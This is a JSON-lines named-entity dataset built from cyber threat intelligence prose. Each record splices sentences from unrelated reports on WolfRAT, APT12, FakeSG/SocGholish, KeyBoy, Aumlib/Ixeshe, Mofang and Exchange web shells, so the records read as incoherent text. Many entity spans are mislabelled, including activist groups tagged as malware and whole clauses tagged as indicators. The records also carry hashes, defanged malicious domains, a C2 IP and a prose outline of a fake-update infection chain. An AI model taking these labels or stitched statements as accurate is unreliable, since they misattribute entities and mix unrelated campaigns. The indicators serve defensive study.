{"text": "It seems , however , if the same victim has more than one device the malware can be reused since the IMEI is sent along with each data exfiltration . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website . The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors : C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe , C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\winword.exe . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 188, "end": 204, "label": "System"}, {"start": 289, "end": 307, "label": "System"}, {"start": 314, "end": 333, "label": "Malware"}, {"start": 375, "end": 393, "label": "Malware"}, {"start": 435, "end": 457, "label": "Indicator"}, {"start": 499, "end": 524, "label": "Indicator"}, {"start": 570, "end": 578, "label": "Organization"}, {"start": 594, "end": 605, "label": "Organization"}, {"start": 622, "end": 632, "label": "Organization"}]}
{"text": "It is clear that this RAT is under intense development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables . WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 343, "end": 359, "label": "System"}, {"start": 363, "end": 372, "label": "System"}, {"start": 409, "end": 413, "label": "System"}, {"start": 443, "end": 453, "label": "Malware"}, {"start": 495, "end": 512, "label": "Malware"}, {"start": 540, "end": 558, "label": "Malware"}, {"start": 571, "end": 578, "label": "Organization"}, {"start": 627, "end": 641, "label": "System"}, {"start": 653, "end": 666, "label": "Organization"}]}
{"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 306, "end": 311, "label": "Organization"}, {"start": 462, "end": 472, "label": "Organization"}, {"start": 620, "end": 633, "label": "System"}, {"start": 637, "end": 645, "label": "System"}]}
{"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity . APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": [{"start": 42, "end": 49, "label": "Malware"}, {"start": 181, "end": 190, "label": "System"}, {"start": 213, "end": 227, "label": "Organization"}, {"start": 323, "end": 328, "label": "Organization"}, {"start": 486, "end": 498, "label": "Organization"}]}
{"text": "After all , a working product is often more important than a stable product . The activity dates to at least 2013 and has ties to multiple reports by other researchers . Public disclosures may result in an immediate change in APT12 \u2019s tools . The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 226, "end": 231, "label": "Organization"}, {"start": 251, "end": 259, "label": "Organization"}, {"start": 276, "end": 282, "label": "Organization"}]}
{"text": "We watched WolfRAT evolve through various iterations which shows that the actor wanted to ensure functional improvements \u2014 perhaps they had deadlines to meet for their customers , but with no thought given to removing old code blocks , classes , etc . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook . These changes may be temporary and FireEye believes they are aimed at decreasing detection of their tools until a more permanent and effective TTP change can be implemented ( e.g. , WATERSPOUT ) . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 272, "end": 280, "label": "System"}, {"start": 490, "end": 497, "label": "Organization"}, {"start": 637, "end": 647, "label": "Malware"}, {"start": 656, "end": 669, "label": "Organization"}, {"start": 687, "end": 701, "label": "System"}]}
{"text": "throughout the Android package . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists . Although these points do not definitively tie WATERSPOUT to APT12 , they do indicate a possible connection between the WATERSPOUT campaign , the THREEBYTE campaign , and the HIGHTIDE campaign attributed to APT12 . While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 175, "end": 185, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 274, "end": 283, "label": "Malware"}, {"start": 303, "end": 311, "label": "Malware"}, {"start": 335, "end": 340, "label": "Organization"}, {"start": 349, "end": 355, "label": "Organization"}, {"start": 356, "end": 520, "label": "Indicator"}, {"start": 526, "end": 536, "label": "Organization"}]}
{"text": "WolfRAT is a specifically targeted RAT which we assess to be aimed at Thai individuals and , based on previous work from Wolf Research , most likely used as an intelligence-gathering tool or interception tool . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 121, "end": 136, "label": "Organization"}, {"start": 230, "end": 236, "label": "Organization"}, {"start": 278, "end": 284, "label": "System"}, {"start": 372, "end": 380, "label": "System"}, {"start": 440, "end": 447, "label": "Organization"}, {"start": 473, "end": 480, "label": "Malware"}, {"start": 484, "end": 492, "label": "Malware"}, {"start": 563, "end": 568, "label": "Organization"}, {"start": 641, "end": 649, "label": "Organization"}, {"start": 662, "end": 670, "label": "Organization"}, {"start": 679, "end": 691, "label": "Organization"}]}
{"text": "This can be packaged and \" sold '' in many different ways to customers . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . These development efforts may have resulted in the emergence of the WATERSPOUT backdoor . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 338, "end": 357, "label": "Malware"}, {"start": 360, "end": 434, "label": "Indicator"}, {"start": 438, "end": 448, "label": "Organization"}]}
{"text": "A \" Tracking tool '' or an \" Admin tool '' are often cited for these kinds of tools for \" commercial '' or \" enterprise '' usage . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . Though public disclosures resulted in APT12 adaptations , FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 148, "end": 166, "label": "System"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 331, "end": 336, "label": "Organization"}, {"start": 443, "end": 457, "label": "System"}]}
{"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 . Similarly , the public disclosure of APT12 \u2019s intrusion at the New York Times also led to only a brief pause in the threat group \u2019s activity and immediate changes in TTPs . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": [{"start": 266, "end": 271, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}, {"start": 412, "end": 510, "label": "Indicator"}]}
{"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain . The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report . As a result , we decided to call this variant FakeSG .", "spans": [{"start": 194, "end": 198, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 356, "end": 364, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}]}
{"text": "The chat details , WhatsApp records , messengers and SMSs of the world carry some sensitive information which people often forget when communicating with their devices . In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples . Currently , APT12 continues to target organizations and conduct cyber operations using its new tools . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 19, "end": 27, "label": "System"}, {"start": 328, "end": 336, "label": "System"}, {"start": 435, "end": 441, "label": "System"}, {"start": 504, "end": 509, "label": "Organization"}, {"start": 631, "end": 644, "label": "Organization"}]}
{"text": "We see WolfRAT specifically targeting a highly popular encrypted chat app in Asia , Line , which suggests that even a careful user with some awareness around end-to-end encryption chats would still be at the mercy of WolfRAT and it 's prying eyes . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 . Most recently , FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company . On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 7, "end": 14, "label": "Malware"}, {"start": 84, "end": 88, "label": "System"}, {"start": 217, "end": 224, "label": "Malware"}, {"start": 300, "end": 316, "label": "Malware"}, {"start": 317, "end": 326, "label": "Malware"}, {"start": 411, "end": 419, "label": "System"}, {"start": 438, "end": 445, "label": "Organization"}, {"start": 455, "end": 463, "label": "Malware"}, {"start": 521, "end": 526, "label": "Organization"}, {"start": 527, "end": 546, "label": "Malware"}, {"start": 599, "end": 607, "label": "Organization"}]}
{"text": "IOCS Hashes 139edb1bc033725539b117f50786f3d3362ed45845c57fe1f82e7ed72b044367 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 e5f346d8f312cc1f93c2c6af611e2f50805c528934786ea173cabc6a39b14cda This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . APT12 . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 12, "end": 76, "label": "Indicator"}, {"start": 77, "end": 141, "label": "Indicator"}, {"start": 142, "end": 206, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 277, "end": 285, "label": "Malware"}, {"start": 326, "end": 365, "label": "Malware"}, {"start": 415, "end": 420, "label": "Organization"}, {"start": 437, "end": 446, "label": "Organization"}, {"start": 447, "end": 530, "label": "Indicator"}, {"start": 537, "end": 550, "label": "System"}, {"start": 562, "end": 576, "label": "Malware"}]}
{"text": "1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way . The attackers behind the breach of the New York Times \u2019 computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 305, "end": 324, "label": "System"}, {"start": 448, "end": 462, "label": "Organization"}, {"start": 587, "end": 599, "label": "Organization"}, {"start": 645, "end": 658, "label": "Organization"}]}
{"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP.com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 303, "end": 322, "label": "System"}, {"start": 608, "end": 614, "label": "Organization"}, {"start": 615, "end": 695, "label": "Indicator"}]}
{"text": "ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . The newest campaign uses updated versions of Aumlib and Ixeshe . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 138, "end": 147, "label": "Indicator"}, {"start": 152, "end": 169, "label": "Organization"}, {"start": 239, "end": 246, "label": "System"}, {"start": 346, "end": 352, "label": "Malware"}, {"start": 357, "end": 363, "label": "Malware"}, {"start": 445, "end": 455, "label": "Organization"}]}
{"text": "] ponethus [ . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . Aumlib , which for years has been used in targeted attacks , now encodes certain HTTP communications . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 18, "end": 35, "label": "Organization"}, {"start": 105, "end": 112, "label": "System"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 248, "end": 252, "label": "Indicator"}, {"start": 293, "end": 331, "label": "Organization"}]}
{"text": "] com svc [ . They are often targeted simultaneously with other ethnic minorities and religious groups in China . FireEye researchers spotted the malware when analyzing a recent attempted attack on an organization involved in shaping economic policy . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 64, "end": 81, "label": "Organization"}, {"start": 86, "end": 102, "label": "Organization"}, {"start": 114, "end": 121, "label": "Organization"}, {"start": 320, "end": 326, "label": "System"}, {"start": 329, "end": 353, "label": "Indicator"}, {"start": 359, "end": 364, "label": "System"}, {"start": 367, "end": 393, "label": "Indicator"}]}
{"text": "] ponethus [ . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . And a new version of Ixeshe , which has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 41, "end": 57, "label": "Malware"}, {"start": 77, "end": 115, "label": "Organization"}, {"start": 144, "end": 154, "label": "Organization"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 388, "end": 398, "label": "Organization"}]}
{"text": "] com www [ . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power . The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 38, "end": 52, "label": "Organization"}, {"start": 302, "end": 308, "label": "Malware"}, {"start": 456, "end": 464, "label": "Organization"}, {"start": 506, "end": 520, "label": "System"}]}
{"text": "] ponethus [ . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": [{"start": 28, "end": 40, "label": "Malware"}, {"start": 61, "end": 83, "label": "Malware"}, {"start": 110, "end": 138, "label": "Malware"}, {"start": 443, "end": 487, "label": "Indicator"}, {"start": 550, "end": 564, "label": "System"}]}
{"text": "] com webmail [ . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community . But , larger , more successful threat actors tend to evolve at a slower rate . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 6, "end": 17, "label": "Indicator"}, {"start": 128, "end": 145, "label": "Organization"}, {"start": 227, "end": 317, "label": "Indicator"}, {"start": 323, "end": 338, "label": "System"}, {"start": 341, "end": 459, "label": "Malware"}, {"start": 462, "end": 476, "label": "Malware"}]}
{"text": "] ponethus [ . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy . As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 57, "end": 68, "label": "System"}, {"start": 146, "end": 152, "label": "System"}, {"start": 341, "end": 360, "label": "Organization"}, {"start": 422, "end": 436, "label": "Malware"}, {"start": 437, "end": 539, "label": "Indicator"}]}
{"text": "] com nampriknum [ . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) . These threat actors \u2019 tactics follow the same principles of evolution \u2013 successful techniques propagate , and unsuccessful ones are abandoned . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 6, "end": 20, "label": "Indicator"}, {"start": 105, "end": 123, "label": "Organization"}, {"start": 163, "end": 181, "label": "Organization"}, {"start": 211, "end": 241, "label": "Organization"}, {"start": 432, "end": 492, "label": "Indicator"}]}
{"text": "] net www [ . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests . Attackers do not change their approach unless an external force or environmental shift compels them to . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 18, "end": 23, "label": "Organization"}, {"start": 139, "end": 153, "label": "Organization"}, {"start": 412, "end": 426, "label": "System"}, {"start": 430, "end": 445, "label": "Indicator"}]}
{"text": "] nampriknum [ . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 . As the old saying goes : If it ain\u2019t broke , don\u2019t fix it . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 102, "end": 117, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 214, "end": 234, "label": "Malware"}, {"start": 267, "end": 282, "label": "Organization"}]}
{"text": "] net svc [ . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco . So when a larger , successful threat actor changes up tactics , the move always piques our attention . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 78, "end": 84, "label": "System"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 234, "end": 244, "label": "Organization"}, {"start": 251, "end": 264, "label": "Malware"}, {"start": 347, "end": 358, "label": "Organization"}, {"start": 367, "end": 378, "label": "System"}, {"start": 394, "end": 408, "label": "Malware"}]}
{"text": "] nampriknum [ . These versions of KeyBoy differed from the one first described by Rapid7 in several ways , many of which will be described in the sections to follow . Naturally , our first priority is ensuring that we detect the new or altered TTPs . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 35, "end": 41, "label": "System"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 290, "end": 304, "label": "Malware"}]}
{"text": "] net svcws [ . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus . But we also attempt to figure out why the adversary changed \u2014 what broke? \u2014 so that we can predict if and when they will change again in the future . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 372, "end": 388, "label": "Organization"}]}
{"text": "] nampriknum [ . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . We observed an example of this phenomenon around May . While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": [{"start": 55, "end": 69, "label": "System"}, {"start": 179, "end": 207, "label": "Malware"}]}
{"text": "] net svc [ . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . About four months after The New York Times publicized an attack on its network , the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 6, "end": 13, "label": "Indicator"}, {"start": 158, "end": 164, "label": "System"}, {"start": 179, "end": 205, "label": "System"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 434, "end": 453, "label": "Indicator"}, {"start": 458, "end": 477, "label": "Indicator"}, {"start": 559, "end": 569, "label": "Organization"}]}
{"text": "] somtum [ . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware . The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 70, "end": 76, "label": "System"}, {"start": 223, "end": 229, "label": "Malware"}, {"start": 329, "end": 341, "label": "Organization"}]}
{"text": "] today svcws [ . This sample was also found to be deployed using the CVE-2012-0158 vulnerability . We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 8, "end": 17, "label": "Indicator"}, {"start": 70, "end": 83, "label": "Vulnerability"}, {"start": 220, "end": 244, "label": "Organization"}]}
{"text": "] somtum [ . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . But we do know the change was sudden . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": [{"start": 39, "end": 63, "label": "Organization"}, {"start": 97, "end": 118, "label": "Malware"}, {"start": 134, "end": 160, "label": "System"}, {"start": 230, "end": 254, "label": "Organization"}, {"start": 295, "end": 320, "label": "System"}]}
{"text": "] today www [ . Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved . Akin to turning a battleship , retooling TTPs of large threat actors is formidable . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 55, "end": 61, "label": "Organization"}, {"start": 149, "end": 160, "label": "Organization"}]}
{"text": "] somtum [ . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries . Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": [{"start": 54, "end": 60, "label": "Organization"}, {"start": 123, "end": 133, "label": "Organization"}, {"start": 136, "end": 144, "label": "Organization"}, {"start": 147, "end": 170, "label": "Organization"}, {"start": 179, "end": 189, "label": "Organization"}, {"start": 194, "end": 211, "label": "Organization"}, {"start": 387, "end": 532, "label": "Indicator"}]}
{"text": "] today somtum [ . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang . The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server \u2019s Unified Messaging Service .", "spans": [{"start": 8, "end": 18, "label": "Indicator"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 143, "end": 149, "label": "Organization"}, {"start": 197, "end": 216, "label": "Indicator"}, {"start": 221, "end": 240, "label": "Indicator"}, {"start": 257, "end": 319, "label": "Indicator"}, {"start": 350, "end": 394, "label": "System"}]}
{"text": "] today shop [ . The name Mofang is based on the Mandarin verb , which means to imitate . Backdoor.APT.Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": [{"start": 8, "end": 16, "label": "Indicator"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 90, "end": 109, "label": "Indicator"}, {"start": 182, "end": 190, "label": "System"}]}
{"text": "] databit [ . It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated . A recently observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib . In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": [{"start": 43, "end": 55, "label": "Organization"}, {"start": 182, "end": 214, "label": "Indicator"}, {"start": 253, "end": 259, "label": "Malware"}, {"start": 302, "end": 326, "label": "Organization"}]}
{"text": "] today svc [ . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter . The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL : We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 78, "end": 85, "label": "System"}, {"start": 90, "end": 104, "label": "System"}, {"start": 309, "end": 334, "label": "Organization"}]}
{"text": "] databit [ . The Mofang group has been active in relation to the Kyaukphyu sez . status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": [{"start": 18, "end": 30, "label": "Organization"}, {"start": 82, "end": 100, "label": "Indicator"}, {"start": 106, "end": 117, "label": "Indicator"}, {"start": 121, "end": 139, "label": "Indicator"}, {"start": 145, "end": 152, "label": "Indicator"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 220, "end": 255, "label": "Vulnerability"}, {"start": 297, "end": 322, "label": "System"}]}
{"text": "] today test [ . KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine . This output reveals the following changes when compared with earlier variants : Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": [{"start": 8, "end": 16, "label": "Indicator"}, {"start": 17, "end": 23, "label": "System"}, {"start": 90, "end": 122, "label": "Malware"}, {"start": 143, "end": 160, "label": "Malware"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 299, "end": 314, "label": "System"}, {"start": 384, "end": 393, "label": "Organization"}]}
{"text": "] databit [ . The first attack started in early July with a ShimRatReporter payload . The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . ) The POST body is now encoded . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": [{"start": 60, "end": 75, "label": "Malware"}, {"start": 119, "end": 129, "label": "Indicator"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 196, "end": 204, "label": "Indicator"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 309, "end": 316, "label": "Organization"}, {"start": 323, "end": 330, "label": "Organization"}]}
{"text": "] today www [ . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez . These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family . We recommend following Microsoft \u2019s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 47, "end": 53, "label": "Organization"}, {"start": 230, "end": 236, "label": "Malware"}]}
{"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 179, "end": 211, "label": "Indicator"}, {"start": 238, "end": 244, "label": "Malware"}, {"start": 267, "end": 299, "label": "Indicator"}, {"start": 385, "end": 405, "label": "Organization"}, {"start": 408, "end": 425, "label": "Organization"}, {"start": 430, "end": 440, "label": "Organization"}, {"start": 450, "end": 466, "label": "Organization"}]}
